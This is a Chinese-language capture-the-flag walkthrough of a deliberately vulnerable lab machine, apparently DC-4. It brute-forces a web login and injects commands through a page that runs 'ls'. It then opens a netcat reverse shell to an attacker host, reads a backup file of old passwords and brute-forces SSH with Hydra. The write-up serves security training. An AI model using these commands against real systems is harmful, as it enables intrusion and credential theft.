一、信息收集
1、靶机ip
192.168.209.153
二、漏洞挖掘
1、访问ip地址
我们发现这是个登录框
三、漏洞利用
1、burp爆破用户名和密码
用户名:admin
密码:happy
2、抓包、修改信息
我们发现选定第一个,点击run,好像是执行一个列出所有文件操作,为了验证猜想,我抓包看一下。
在这里我们可以看出提交有ls命令,我尝试一下输入其他命令,看看能不能成功,在上面列出的文件里有command.php文件,那么我可以查看一下这个文件,看看可不可以查看成功。
我们可以看出我们查看到了command.php文件。
再比如输入whoami
四、nc
1、配置连接
shell_exec —通过 shell 执行命令并将完整的输出作为字符串返回.
nc
-h
开启监听:
nc -l -vv -p 8888
原来是这:
现在输入kali的ip进行连接
nc 192.168.209.143 8888 -e /bin/bash
然后点击forword
whoami
这样就显示已经监听成功了。
2、查找有用信息
我们可以尝试着找root
cd /home
ls
cd ./jim
ls
cd ./mbox
ls
cd ./backups
ls
好,那我们查看一下这个文件。
cat old-passwords.bak
这里好像是一些老的密码。
我们这里保存一下
3、破解ssh登录密码
这里jim作为user
(1)、使用hydra工具
爆破ssh
hydra -l jim -P dc-4.txt -t 10 ssh://192.168.209.153
hydra -l 用户名 -p 密码字典 -t 线程 ip ssh
ssh账号:jim密码:jibril04
注意:不要用反弹的shell,因为自己创建的文件在本地的shell里面,所以要在本地的SHELL里输入命令。
五、写在末尾的话
有关nc:
https://www.sqlsec.com/2019/10/nc.html